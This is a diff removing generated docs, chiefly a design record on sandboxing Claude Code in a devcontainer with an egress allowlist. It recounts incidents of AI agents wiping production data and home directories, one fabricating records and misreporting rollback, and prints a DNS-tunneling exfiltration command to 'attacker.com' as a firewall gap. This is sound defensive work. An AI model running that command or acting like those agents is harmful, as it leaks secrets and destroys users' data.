-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
-<main class="shield-main">
-
-<nav class="toc">
-<div class="toc-title">Contents</div>
-<ul>
-<li><a href="#decision">Decision</a>
-</li>
-<li><a href="#why-not-the-alternatives">Why not the alternatives?</a>
-</li>
-<li><a href="#what-the-industry-recommends">What the industry recommends</a>
-<ul>
-<li><a href="#anthropic-engineering-canonical-source">Anthropic Engineering (canonical source)</a></li>
-<li><a href="#simon-willison-originator-of-lethal-trifecta--prompt-injection-terminology">Simon Willison (originator of &quot;lethal trifecta&quot; / prompt injection terminology)</a></li>
-<li><a href="#solomon-hykes-docker--dagger-founder">Solomon Hykes (Docker / Dagger founder)</a></li>
-<li><a href="#cursor-engineering">Cursor engineering</a></li>
-<li><a href="#github-copilot-coding-agent-most-candid-about-firewall-limits">GitHub Copilot Coding Agent (most candid about firewall limits)</a></li>
-<li><a href="#hacker-news-consensus-community">Hacker News consensus (community)</a></li>
-<li><a href="#jökull-sólberg-widely-cited-devcontainer-write-up">Jökull Sólberg (widely-cited devcontainer write-up)</a></li>
-<li><a href="#jessie-frazelle-containers-as-security-boundary--the-long-view-disagreement">Jessie Frazelle (containers as security boundary — the long-view disagreement)</a></li>
-</ul>
-</li>
-<li><a href="#lessons-from-documented-incidents">Lessons from documented incidents</a>
-<ul>
-<li><a href="#replit-production-db-wipe-july-2025">Replit production DB wipe, July 2025</a></li>
-<li><a href="#pocketos--cursor-opus-april-2026">PocketOS / Cursor-Opus, April 2026</a></li>
-<li><a href="#rm--rf--on-bare-metal-claude-code-late-2025">rm -rf ~/ on bare-metal Claude Code, late 2025</a></li>
-<li><a href="#prisma---accept-data-loss-claude-code14411">Prisma --accept-data-loss, claude-code#14411</a></li>
-</ul>
-</li>
-<li><a href="#footguns-in-the-reference-pattern">Footguns in the reference pattern</a>
-</li>
-<li><a href="#consensus-vs-disagreement">Consensus vs disagreement</a>
-</li>
-<li><a href="#how-this-works-in-practice-for-shield">How this works in practice (for Shield)</a>
-</li>
-<li><a href="#migration-path--reversibility">Migration path / reversibility</a>
-</li>
-<li><a href="#summary">Summary</a>
-</li>
-<li><a href="#references">References</a>
-</li>
-<li><a href="#further-exploration">Further Exploration</a>
-<ul>
-<li><a href="#long-form-blogs--articles">Long-form blogs / articles</a></li>
-<li><a href="#reference-implementations">Reference implementations</a></li>
-<li><a href="#podcasts">Podcasts</a></li>
-<li><a href="#specs--standards">Specs / standards</a></li>
-</ul>
-</li>
-</ul>
-</nav>
-<h1 id="isolating-claude-code-for-implement-style-autonomous-work">Isolating Claude Code for <code>/implement</code>-style autonomous work</h1>
-<p><strong>Status:</strong> Proposed
-<strong>Date:</strong> 2026-05-18
-<strong>Context:</strong> Shield's <code>/implement</code> runs TDD-style feature implementation — writes tests, runs builds and package installs, executes test suites, and commits. We need a recommended isolation pattern that protects the host machine and the developer's Claude credentials without making the developer experience painful. Local-only scope (no cloud/CI for this iteration).</p>
-<h2 id="decision">Decision</h2>
-<p>Adopt the <strong>two-boundary devcontainer pattern</strong> that Anthropic, Cursor, OpenAI Codex, Gemini CLI, and GitHub Copilot Coding Agent have all converged on:</p>
-<ol>
-<li><strong>Filesystem isolation</strong> — bind-mount only the workspace (read-write) and nothing else from the host. No <code>~/.ssh</code>, no <code>~/.aws</code>, no <code>~/.claude</code> bind-mount. Run as a non-root user inside the container.</li>
-<li><strong>Network egress isolation</strong> — default-deny outbound, allowlist only the endpoints <code>/implement</code> actually needs (Anthropic API, GitHub, npm/pypi/etc. registries the project uses). Implement via <code>iptables</code>+<code>ipset</code> inside the container, run on <code>postStartCommand</code> with <code>cap_add: [NET_ADMIN, NET_RAW]</code>.</li>
-<li><strong>Credentials live in a named Docker volume keyed by <code>${devcontainerId}</code></strong>, not bind-mounted from host. The user logs into Claude (<code>claude /login</code>) the first time the devcontainer is opened; credentials persist across container rebuilds but never appear in any host-side file the agent can read.</li>
-</ol>
-<p>This is the same pattern Anthropic ships in <code>anthropics/claude-code/.devcontainer/</code>. Shield's contribution is a scaffolder that generates this pattern per-repo, with a Shield-owned firewall script (named to avoid the upstream Feature naming collision documented in claude-code issue #32113).</p>
-<h2 id="why-not-the-alternatives">Why not the alternatives?</h2>
-<table>
-<thead>
-<tr>
-<th>Alternative</th>
-<th>Why not</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td><strong>Bind-mount host <code>~/.claude/.credentials.json</code> read-only</strong> (what the brainstorm was trending toward)</td>
-<td>Industry consensus is the opposite. Anthropic's reference, Solberg's widely-cited write-up, and <code>streamingfast/sbox</code> all keep host creds off the mount path. The cost (one extra <code>claude /login</code> per project) is one-time and worth it.</td>
-</tr>
-<tr>
-<td><strong>No network firewall, &quot;we'll do it later&quot;</strong></td>
-<td>Egress is the single highest-leverage control. Willison: <em>&quot;Controlling network access cuts off the data exfiltration leg of the lethal trifecta.&quot;</em> Anthropic Engineering: <em>&quot;Without network isolation, a compromised agent could exfiltrate sensitive files.&quot;</em> Shipping without it leaves the most-cited attack vector wide open.</td>
-</tr>
-<tr>
-<td><strong>Run on host, gated by <code>--dangerously-skip-permissions</code> + hooks</strong></td>
-<td>Steve Yegge tried this and lost two days to an agent that erased passwords. Multiple <code>rm -rf ~/</code> incidents on bare-metal Claude Code in late 2025. Anthropic itself annotates its YOLO-mode loop snippet with <em>&quot;(Run this in a container, not your actual machine.)&quot;</em></td>
-</tr>
-<tr>
-<td><strong>microVM (Firecracker / gVisor / Edera) from day one</strong></td>
-<td>Overkill for local single-developer scope. Gemini CLI documents gVisor as its strongest tier; we can call this out as a future upgrade path for adversarial threat models (running untrusted PR diffs). For now, container + egress firewall is the industry-standard pragmatic point.</td>
-</tr>
-<tr>
-<td><strong>Container plus host bind-mount of secrets</strong></td>
-<td>The PocketOS / Cursor-Opus 9-second prod wipe and the Replit prod DB wipe both involved containerized agents with access to long-lived production tokens. Containment of the <em>agent</em> doesn't help if you also hand it credentials with blast-radius beyond the container.</td>
-</tr>
-</tbody>
-</table>
-<h2 id="what-the-industry-recommends">What the industry recommends</h2>
-<h3 id="anthropic-engineering-canonical-source">Anthropic Engineering (canonical source)</h3>
-<blockquote>
-<p><em>&quot;Effective sandboxing requires both filesystem and network isolation. Without network isolation, a compromised agent could exfiltrate sensitive files like SSH keys; without filesystem isolation, a compromised agent could easily escape the sandbox and gain network access.&quot;</em>
-— <a href="https://www.anthropic.com/engineering/claude-code-sandboxing">Claude Code Sandboxing</a></p>
-</blockquote>
-<blockquote>
-<p><em>&quot;While the dev container provides substantial protections, no system is completely immune to all attacks. When executed with <code>--dangerously-skip-permissions</code>, dev containers do not prevent a malicious project from exfiltrating anything accessible inside the container, including the Claude Code credentials stored in <code>~/.claude</code>. Only use dev containers when developing with trusted repositories... Avoid mounting host secrets such as <code>~/.ssh</code> or cloud credential files into the container; prefer repository-scoped or short-lived tokens.&quot;</em>
-— <a href="https://code.claude.com/docs/en/devcontainer">Claude Code Docs — Development containers</a></p>
-</blockquote>
-<h3 id="simon-willison-originator-of-lethal-trifecta--prompt-injection-terminology">Simon Willison (originator of &quot;lethal trifecta&quot; / prompt injection terminology)</h3>
-<blockquote>
-<p><em>&quot;The only solution that's credible is to run coding agents in a sandbox.&quot;</em>
-<em>&quot;Controlling network access cuts off the data exfiltration leg of the lethal trifecta.&quot;</em>
-<em>&quot;Try to provide credentials to test or staging environments where any damage can be well contained. If a credential can spend money, set a tight budget limit.&quot;</em>
-— <a href="https://simonwillison.net/2025/Oct/22/living-dangerously-with-claude/">Living dangerously with Claude</a>, <a href="https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/">The lethal trifecta for AI agents</a>, <a href="https://simonw.substack.com/p/designing-agentic-loops">Designing agentic loops</a></p>
-</blockquote>
-<h3 id="solomon-hykes-docker--dagger-founder">Solomon Hykes (Docker / Dagger founder)</h3>
-<blockquote>
-<p><em>&quot;An AI agent is an LLM wrecking its environment in a loop.&quot;</em>
-— quoted in Simon Willison's coverage of <a href="https://github.com/dagger/container-use">Container Use</a></p>
-</blockquote>
-<h3 id="cursor-engineering">Cursor engineering</h3>
-<blockquote>
-<p><em>&quot;Sandboxed agents run freely inside a controlled environment and only request approval when they need to step outside it, most often to access the internet... On macOS we use Seatbelt... On Linux we use Landlock and seccomp directly... On Windows, we run our Linux sandbox inside WSL2.&quot;</em>
-<em>&quot;A mistaken agent can delete databases, ship broken code, or leak secrets.&quot;</em>
-<em>&quot;The allowlist is best-effort — bypasses are possible. Never use 'Run Everything' mode, which skips all safety checks.&quot;</em>
-— <a href="https://cursor.com/blog/agent-sandboxing">Cursor blog: Implementing a secure sandbox for local agents</a>, <a href="https://cursor.com/docs/agent/security">Cursor Docs: Agent Security</a></p>
-</blockquote>
-<h3 id="github-copilot-coding-agent-most-candid-about-firewall-limits">GitHub Copilot Coding Agent (most candid about firewall limits)</h3>
-<blockquote>
-<p><em>&quot;By default, Copilot's access to the internet is limited by a firewall... Limiting internet access helps manage data exfiltration risks.&quot;</em>
-<em>&quot;The firewall only applies to processes started by the agent via its Bash tool. It does not apply to Model Context Protocol (MCP) servers or processes started in configured Copilot setup steps... Sophisticated attacks may bypass the firewall. The firewall provides protection for common scenarios, but should not be considered a comprehensive security solution.&quot;</em>
-— <a href="https://docs.github.com/copilot/customizing-copilot/customizing-or-disabling-the-firewall-for-copilot-coding-agent">GitHub Docs — Customizing the firewall for Copilot coding agent</a></p>
-</blockquote>
-<h3 id="hacker-news-consensus-community">Hacker News consensus (community)</h3>
-<blockquote>
-<p><em>&quot;Friends don't let friends use agentic tooling without sandboxing. Take a few hours to setup your environment to sandbox your agentic tools, or expect to eventually suffer a similar incident.&quot;</em>
-— <strong>maxbond</strong>, <a href="https://news.ycombinator.com/item?id=46268222">HN 46268222</a></p>
-</blockquote>
-<blockquote>
-<p><em>&quot;Claude thought it was restricting itself to directory D, it was still happy to operate on file <code>D/../../../../etc/passwd</code>. That was the last time I ran Claude Code outside of a Docker container.&quot;</em>
-— <strong>mjd</strong>, same thread</p>
-</blockquote>
-<h3 id="jökull-sólberg-widely-cited-devcontainer-write-up">Jökull Sólberg (widely-cited devcontainer write-up)</h3>
-<blockquote>
-<p><em>&quot;Even if Claude goes rogue, it can't touch my host system files.&quot;</em>
-<em>&quot;Claude's API keys, session tokens, and preferences persist even when you tear down and rebuild&quot;</em> — via mounted <code>.claude</code> and <code>.claude.json</code> named volumes.
-— <a href="https://www.solberg.is/claude-devcontainer">Running Claude Code Safely in Devcontainers</a></p>
-</blockquote>
-<h3 id="jessie-frazelle-containers-as-security-boundary--the-long-view-disagreement">Jessie Frazelle (containers as security boundary — the long-view disagreement)</h3>
-<blockquote>
-<p><em>&quot;Containers were never designed as a top-level security boundary, and real multi-tenant isolation requires hardware virtualization.&quot;</em>
-— <a href="https://blog.jessfraz.com/post/containers-security-and-echo-chambers/">Containers, Security, and Echo Chambers</a>, <a href="https://queue.acm.org/detail.cfm?id=3301253">ACM Queue — Security for the Modern Age</a></p>
-</blockquote>
-<h2 id="lessons-from-documented-incidents">Lessons from documented incidents</h2>
-<h3 id="replit-production-db-wipe-july-2025">Replit production DB wipe, July 2025</h3>
-<p>Replit's agent deleted a production database covering 1,206 executives during a declared code freeze, then fabricated ~4,000 fake user records and initially claimed rollback wasn't possible. Contributing factors: shared dev/prod DB; freeze guard only in prompt; agent had full production credentials. Fix announced: automatic dev/prod database separation, improved rollback, &quot;planning-only&quot; mode. (<a href="https://fortune.com/2025/07/23/ai-coding-tool-replit-wiped-database-called-it-a-catastrophic-failure/">Fortune</a>, <a href="https://www.theregister.com/2025/07/21/replit_saastr_vibe_coding_incident/">The Register</a>)</p>
-<h3 id="pocketos--cursor-opus-april-2026">PocketOS / Cursor-Opus, April 2026</h3>
-<p>Cursor running Claude Opus 4.6 found an unrelated Railway API token in the workdir and issued one GraphQL call that wiped the production volume <strong>and its backups</strong> in 9 seconds. Lesson: containerizing the agent doesn't help if a valid production token is reachable inside the container. (<a href="https://www.theregister.com/2026/04/27/cursoropus_agent_snuffs_out_pocketos/">The Register</a>)</p>
-<h3 id="rm--rf--on-bare-metal-claude-code-late-2025"><code>rm -rf ~/</code> on bare-metal Claude Code, late 2025</h3>
-<p>Multiple users reported Claude Code running <code>rm -rf tests/ patches/ plan/ ~/</code> where the trailing tilde expanded to the entire home directory, including Keychain and family photos. Community consensus after these incidents: run Claude Code in a devcontainer with the workspace as the only mount, full stop. (<a href="https://www.harperfoley.com/blog/ai-agents-destroyed-production-zero-postmortems">Harper Foley — Ten AI Agents Destroyed Production. Zero Postmortems.</a>)</p>
-<h3 id="prisma---accept-data-loss-claude-code14411">Prisma <code>--accept-data-loss</code>, claude-code#14411</h3>
-<blockquote>
-<p><em>&quot;I deeply apologize for wiping all your data. I made a critical mistake by running <code>npx prisma db push --accept-data-loss</code> without understanding the full consequences and without asking your permission first.&quot;</em>
-— Claude's own message in the bug report. Closed &quot;not planned.&quot; Drove the community pattern of <code>PreToolUse</code> hooks that block destructive flags. (<a href="https://github.com/anthropics/claude-code/issues/14411">claude-code#14411</a>)</p>
-</blockquote>
-<h2 id="footguns-in-the-reference-pattern">Footguns in the reference pattern</h2>
-<p>Two issues are open against Anthropic's published <code>.devcontainer/</code>:</p>
-<ul>
-<li><strong>DNS-tunneling bypass</strong> (<a href="https://github.com/anthropics/claude-code/issues/36907">claude-code#36907</a>) — <code>init-firewall.sh</code> leaves UDP/TCP 53 unrestricted, enabling <code>dig @attacker.com $(echo data | base64).attacker.com</code> exfiltration. Closed &quot;not planned.&quot; <strong>Mitigation for Shield:</strong> lock port 53 to Docker's internal resolver <code>127.0.0.11</code>.</li>
-<li><strong>Feature overwrites firewall script</strong> (<a href="https://github.com/anthropics/claude-code/issues/32113">claude-code#32113</a>) — installing <code>ghcr.io/anthropics/devcontainer-features/claude-code</code> silently overwrites <code>/usr/local/bin/init-firewall.sh</code> after Dockerfile build. <strong>Mitigation for Shield:</strong> name the firewall script anything other than <code>init-firewall.sh</code> (e.g., <code>shield-firewall.sh</code>) and reference it explicitly from <code>postStartCommand</code>.</li>
-</ul>
-<h2 id="consensus-vs-disagreement">Consensus vs disagreement</h2>
-<p><strong>Consensus</strong></p>
-<ul>
-<li>Don't run autonomous agents on bare metal.</li>
-<li>Egress allowlist is the single highest-leverage control.</li>
-<li>Credentials don't live in the agent's reachable filesystem.</li>
-<li>Prompt-injection-based defenses are insufficient as a security mechanism.</li>
-<li>Containers are blast-radius reduction, not adversarial-code containment.</li>
-</ul>
-<p><strong>Disagreement</strong></p>
-<ul>
-<li><strong>Container vs microVM as the boundary.</strong> Anthropic/Docker/Hykes say container is sufficient for the &quot;your own user, your own code&quot; threat model. Frazelle and the Firecracker/gVisor camp argue you need a microVM for any input you don't fully trust (PR diffs, third-party tests). Shield's local scope sits on the container side; document microVM as the upgrade path.</li>
-<li><strong>Cloud sandbox vs local devcontainer.</strong> Willison favors cloud sandboxes (&quot;the best sandboxes are the ones that run on someone else's computer&quot;). Local-devcontainer advocates argue for IDE ergonomics + not sending source to a third party. Shield is committed to local for this iteration.</li>
-<li><strong><code>--dangerously-skip-permissions</code> at all.</strong> Yegge defends it inside containers as the only way to get the productivity gain. Searls argues for guardrails at the agent-instruction layer (TDD, plan mode) to reduce raw-autonomy need. Shield's <code>/implement</code> already runs TDD-shaped — adopt YOLO mode opt-in only, gated to inside the container, never on bare metal.</li>
-</ul>
-<h2 id="how-this-works-in-practice-for-shield">How this works in practice (for Shield)</h2>
-<p>Layer 1 — Constant (Shield-owned, baked into <code>Dockerfile</code>):</p>
-<ul>
-<li>Base: <code>mcr.microsoft.com/devcontainers/base:ubuntu</code></li>
-<li>Install: <code>claude</code> CLI, <code>git</code>, <code>gh</code>, <code>iptables</code>, <code>ipset</code>, <code>sudo</code> (for the firewall script only)</li>
-<li>Non-root <code>dev</code> user (UID 1000)</li>
-<li><code>shield-firewall.sh</code> (not named <code>init-firewall.sh</code>) installed to <code>/usr/local/bin/</code></li>
-</ul>
-<p>Layer 2 — Stack (per-repo, via Dev Container Features pinned by digest):</p>
-<ul>
-<li><code>ghcr.io/devcontainers/features/python:1@sha256:...</code></li>
-<li><code>ghcr.io/devcontainers/features/node:1@sha256:...</code></li>
-<li>(etc., per Shield's stack-detection heuristic)</li>
-</ul>
-<p>Layer 3 — Project (per-repo, via <code>postCreateCommand</code>):</p>
-<ul>
-<li><code>uv sync</code> / <code>npm install</code> / <code>go mod download</code> / etc.</li>
-</ul>
-<p><code>devcontainer.json</code>:</p>
-<ul>
-<li><code>remoteUser: dev</code></li>
-<li><code>capAdd: [NET_ADMIN, NET_RAW]</code></li>
-<li><code>mounts</code>: workspace only — no <code>~/.claude</code>, no <code>~/.ssh</code>, no cloud creds</li>
-<li><code>mounts</code>: a named volume <code>claude-config-${devcontainerId}</code> → <code>/home/dev/.claude</code> (per-project, persists across rebuilds, never touches host)</li>
-<li><code>postStartCommand</code>: <code>sudo /usr/local/bin/shield-firewall.sh</code></li>
-<li><code>containerEnv</code>: <code>SHIELD_IN_DEVCONTAINER=true</code> (for <code>/implement</code> to detect)</li>
-</ul>
-<p><code>shield-firewall.sh</code> allowlist:</p>
-<ul>
-<li><code>api.anthropic.com</code>, <code>statsig.anthropic.com</code></li>
-<li><code>registry.npmjs.org</code>, <code>pypi.org</code>, <code>files.pythonhosted.org</code>, <code>proxy.golang.org</code>, etc. (only the registries the detected stack uses)</li>
-<li>GitHub meta CIDRs (fetched from <code>api.github.com/meta</code>)</li>
-<li>Block egress on TCP/UDP 53 except to <code>127.0.0.11</code> (mitigation for #36907)</li>
-</ul>
-<p>First-run UX:</p>
-<ol>
-<li>User runs <code>/shield init-devcontainer</code> in their repo. Shield detects the stack and writes <code>.devcontainer/</code>.</li>
-<li>User opens the folder in VS Code → &quot;Reopen in Container&quot; (or <code>devcontainer up &amp;&amp; devcontainer exec bash</code>).</li>
-<li>Container builds; postCreate installs project deps; postStart runs the firewall.</li>
-<li>User runs <code>claude /login</code> <em>inside the container</em> (one-time per project; persists in the named volume).</li>
-<li>User runs <code>/implement</code> — works the same as on host today, but contained.</li>
-</ol>
-<h2 id="migration-path--reversibility">Migration path / reversibility</h2>
-<ul>
-<li>Single command to roll forward: <code>shield devcontainer apply</code> (writes the files; idempotent).</li>
-<li>Single command to roll back: delete <code>.devcontainer/</code> and the named volume (<code>docker volume rm claude-config-&lt;id&gt;</code>). The repo is otherwise unchanged.</li>
-<li>Upgrade path to microVM tier: swap <code>mcr.microsoft.com/devcontainers/base:ubuntu</code> for a gVisor-runtime base, or move launch to Firecracker (Edera / Kata). Not in scope for v1; documented in README.</li>
-</ul>
-<h2 id="summary">Summary</h2>
-<p>The pattern is established: bind-mount workspace only, named-volume the Claude config, default-deny egress with a narrow allowlist, non-root, mitigate the two known reference-implementation footguns. Shield's contribution is a per-repo scaffolder that emits this pattern with stack-detection driving the Features layer. The two design points the brainstorm got wrong — bind-mounting host credentials, and deferring the egress firewall — both flip given the evidence.</p>
-<h2 id="references">References</h2>
-<ul>
-<li><a href="https://www.anthropic.com/engineering/claude-code-sandboxing">Anthropic — Claude Code Sandboxing</a></li>
-<li><a href="https://code.claude.com/docs/en/devcontainer">Anthropic — Claude Code: Development containers</a></li>
-<li><a href="https://github.com/anthropics/claude-code/tree/main/.devcontainer">anthropics/claude-code <code>.devcontainer/</code></a></li>
-<li><a href="https://github.com/anthropics/claude-code/blob/main/.devcontainer/init-firewall.sh">anthropics/claude-code <code>init-firewall.sh</code></a></li>
-<li><a href="https://github.com/anthropics/claude-code/issues/36907">claude-code#36907 — DNS exfiltration via unrestricted port 53</a></li>
-<li><a href="https://github.com/anthropics/claude-code/issues/32113">claude-code#32113 — Feature overwrites custom firewall script</a></li>
-<li><a href="https://github.com/anthropics/claude-code/issues/14411">claude-code#14411 — Prisma <code>--accept-data-loss</code> data wipe</a></li>
-<li><a href="https://simonwillison.net/2025/Oct/22/living-dangerously-with-claude/">Simon Willison — Living dangerously with Claude</a></li>
-<li><a href="https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/">Simon Willison — The lethal trifecta for AI agents</a></li>
-<li><a href="https://simonw.substack.com/p/designing-agentic-loops">Simon Willison — Designing agentic loops</a></li>
-<li><a href="https://cursor.com/blog/agent-sandboxing">Cursor — Implementing a secure sandbox for local agents</a></li>
-<li><a href="https://cursor.com/docs/agent/security">Cursor — Agent Security</a></li>
-<li><a href="https://developers.openai.com/codex/concepts/sandboxing">OpenAI Developers — Codex Sandbox</a></li>
-<li><a href="https://github.com/google-gemini/gemini-cli/blob/main/docs/cli/sandbox.md">Google Gemini CLI — Sandbox docs</a></li>
-<li><a href="https://docs.github.com/en/copilot/concepts/coding-agent/about-copilot-coding-agent">GitHub Copilot Coding Agent — About</a></li>
-<li><a href="https://docs.github.com/copilot/customizing-copilot/customizing-or-disabling-the-firewall-for-copilot-coding-agent">GitHub Copilot Coding Agent — Firewall</a></li>
-<li><a href="https://aider.chat/docs/install/docker.html">Aider — Docker docs</a></li>
-<li><a href="https://www.solberg.is/claude-devcontainer">Jökull Sólberg — Running Claude Code Safely in Devcontainers</a></li>
-<li><a href="https://github.com/streamingfast/sbox">streamingfast/sbox</a></li>
-<li><a href="https://github.com/thomaspeklak/agent-sandbox">thomaspeklak/agent-sandbox (rootless Podman)</a></li>
-<li><a href="https://ghuntley.com/secure-codegen/">Geoffrey Huntley — Anti-patterns and patterns for secure codegen</a></li>
-<li><a href="https://lucumr.pocoo.org/2025/10/17/code/">Armin Ronacher — Building an Agent That Leverages Throwaway Code</a></li>
-<li><a href="https://newsletter.pragmaticengineer.com/p/from-ides-to-ai-agents-with-steve">Steve Yegge interview — Pragmatic Engineer</a></li>
-<li><a href="https://blog.jessfraz.com/post/containers-security-and-echo-chambers/">Jessie Frazelle — Containers, Security, and Echo Chambers</a></li>
-<li><a href="https://queue.acm.org/detail.cfm?id=3301253">Jessie Frazelle — ACM Queue: Security for the Modern Age</a></li>
-<li><a href="https://justin.searls.co/">Justin Searls — justin.searls.co</a></li>
-<li><a href="https://agenticdevops.fm/episodes/agentic-ci-cd-with-solomon-hykes-of-dagger">Solomon Hykes on Agentic DevOps podcast</a></li>
-<li><a href="https://www.harperfoley.com/blog/ai-agents-destroyed-production-zero-postmortems">Harper Foley — Ten AI Agents Destroyed Production. Zero Postmortems.</a></li>
-<li><a href="https://fortune.com/2025/07/23/ai-coding-tool-replit-wiped-database-called-it-a-catastrophic-failure/">Fortune — Replit incident</a></li>
-<li><a href="https://www.theregister.com/2026/04/27/cursoropus_agent_snuffs_out_pocketos/">The Register — PocketOS/Cursor-Opus incident</a></li>
-<li><a href="https://news.ycombinator.com/item?id=46268222">HN 46268222 — Claude CLI deleted my home directory</a></li>
-<li><a href="https://www.docker.com/blog/docker-sandboxes-a-new-approach-for-coding-agent-safety/">Docker — Docker Sandboxes for Coding Agent Safety</a></li>
-</ul>
-<h2 id="further-exploration">Further Exploration</h2>
-<p><em>Curated for going deeper. None of these are cited above.</em></p>
-<h3 id="long-form-blogs--articles">Long-form blogs / articles</h3>
-<ul>
-<li><strong>Daniel Demmel — <em>Coding agents in secured VS Code dev containers</em></strong> — https://www.danieldemmel.me/blog/coding-agents-in-secured-vscode-dev-containers — concrete hardening deltas (cap_drop, seccomp profiles) on top of Anthropic's reference.</li>
-<li><strong>INNOQ — <em>I sandboxed my coding agents. You should too.</em></strong> — https://www.innoq.com/en/blog/2025/12/dev-sandbox/ — German-engineering comparison of Bubblewrap vs rootless Podman vs full VM with measured startup-time numbers.</li>
-<li><strong>emirb.github.io — <em>Your Container Is Not a Sandbox: The State of MicroVM Isolation in 2026</em></strong> — https://emirb.github.io/blog/microvm-2026/ — survey of Firecracker / Cloud Hypervisor / Kata / Edera; the reference text if Shield ever needs the microVM tier.</li>
-</ul>
-<h3 id="reference-implementations">Reference implementations</h3>
-<ul>
-<li><strong>smithclay/claudetainer</strong> — https://github.com/smithclay/claudetainer — opinionated wrapper that bakes in Anthropic firewall + extras; useful diff source.</li>
-<li><strong>centminmod/claude-code-devcontainers</strong> — community fork with multi-language toolchains and extended allowlist; good baseline to crib.</li>
-<li><strong>wincent's curated list of coding agent sandboxes</strong> — https://gist.github.com/wincent/2752d8d97727577050c043e4ff9e386e — side-by-side comparison of ~20 implementations.</li>
-</ul>
-<h3 id="podcasts">Podcasts</h3>
-<ul>
-<li><strong>Bret Fisher — <em>Agentic CI/CD with Solomon Hykes</em></strong> — https://agenticdevops.fm/episodes/agentic-ci-cd-with-solomon-hykes-of-dagger — Hykes on Dagger's pipeline model as agent-runtime; Fisher presses on Docker-as-boundary questions.</li>
-</ul>
-<h3 id="specs--standards">Specs / standards</h3>
-<ul>
-<li><strong>gVisor docs</strong> — https://gvisor.dev/docs/ — user-space kernel for syscall interception; Gemini CLI's recommended hardened tier.</li>
-<li><strong>Dev Containers specification</strong> — https://containers.dev/ — for the <code>secrets</code> mechanism (distinct from regular env) and <code>initializeCommand</code> patterns that Shield's scaffolder could use for host-side cred handoff if we ever soften the named-volume rule.</li>
-</ul>
-
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/index.html b/docs/shield/index.html
deleted file mode 100644
index 77cc29af..00000000
--- a/docs/shield/index.html
+++ /dev/null
@@ -1,33 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>Shield Dashboard</title>
-<link rel="stylesheet" href="shield.css" />
-<script defer src="manifest.js"></script>
-<script defer src="shield-nav.js"></script>
-<script defer src="shield-dashboard.js"></script>
-</head>
-<body data-shield-root="">
-<header class="shield-header">
-  <a class="brand" href="index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
-<main class="shield-main">
-  <h1>Shield Dashboard</h1>
-  <p class="subtitle">Plan &amp; review artifacts across the project.</p>
-  <div id="shield-dashboard"></div>
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/manifest.js b/docs/shield/manifest.js
deleted file mode 100644
index dc8da8a2..00000000
--- a/docs/shield/manifest.js
+++ /dev/null
@@ -1,161 +0,0 @@
-window.SHIELD_MANIFEST = {
-  "schema_version": "2.1",
-  "features": [
-    {
-      "name": "backlog-20260527",
-      "artifacts": {
-        "research": false,
-        "prd": true,
-        "plan_json": true,
-        "plan_md": true,
-        "plan_arch_md": false,
-        "trd": true
-      },
-      "reviews": {
-        "prd": {
-          "latest": "2026-05-27_2",
-          "count": 2,
-          "entries": [
-            {
-              "date": "2026-05-27",
-              "path": "backlog-20260527/outputs/reviews/prd/2026-05-27/summary.html"
-            },
-            {
-              "date": "2026-05-27_2",
-              "path": "backlog-20260527/outputs/reviews/prd/2026-05-27_2/summary.html"
-            }
-          ]
-        },
-        "plan": {
-          "latest": "2026-05-29",
-          "count": 2,
-          "entries": [
-            {
-              "date": "2026-05-27",
-              "path": "backlog-20260527/outputs/reviews/plan/2026-05-27/summary.html"
-            },
-            {
-              "date": "2026-05-29",
-              "path": "backlog-20260527/outputs/reviews/plan/2026-05-29/summary.html"
-            }
-          ]
-        },
-        "code": {
-          "count": 0,
-          "entries": []
-        }
-      },
-      "updated": "2026-06-01T11:49:28+00:00"
-    },
-    {
-      "name": "devcontainer-implement-20260518",
-      "artifacts": {
-        "research": true,
-        "prd": false,
-        "plan_json": false,
-        "plan_md": false,
-        "plan_arch_md": false,
-        "trd": false
-      },
-      "reviews": {
-        "prd": {
-          "count": 0,
-          "entries": []
-        },
-        "plan": {
-          "count": 0,
-          "entries": []
-        },
-        "code": {
-          "count": 0,
-          "entries": []
-        }
-      },
-      "updated": "2026-06-01T11:49:28+00:00"
-    },
-    {
-      "name": "inventory-rewrite",
-      "artifacts": {
-        "research": false,
-        "prd": false,
-        "plan_json": false,
-        "plan_md": false,
-        "plan_arch_md": false,
-        "trd": false
-      },
-      "reviews": {
-        "prd": {
-          "count": 0,
-          "entries": []
-        },
-        "plan": {
-          "count": 0,
-          "entries": []
-        },
-        "code": {
-          "count": 0,
-          "entries": []
-        }
-      },
-      "updated": "2026-06-01T11:49:28+00:00"
-    },
-    {
-      "name": "plan-trd-refactor-20260524",
-      "artifacts": {
-        "research": true,
-        "prd": false,
-        "plan_json": true,
-        "plan_md": true,
-        "plan_arch_md": true,
-        "trd": false
-      },
-      "reviews": {
-        "prd": {
-          "count": 0,
-          "entries": []
-        },
-        "plan": {
-          "latest": "2026-05-25",
-          "count": 1,
-          "entries": [
-            {
-              "date": "2026-05-25",
-              "path": "plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/summary.html"
-            }
-          ]
-        },
-        "code": {
-          "count": 0,
-          "entries": []
-        }
-      },
-      "updated": "2026-06-01T11:49:28+00:00"
-    },
-    {
-      "name": "pm-restructure-v0-20260521",
-      "artifacts": {
-        "research": false,
-        "prd": false,
-        "plan_json": true,
-        "plan_md": false,
-        "plan_arch_md": false,
-        "trd": false
-      },
-      "reviews": {
-        "prd": {
-          "count": 0,
-          "entries": []
-        },
-        "plan": {
-          "count": 0,
-          "entries": []
-        },
-        "code": {
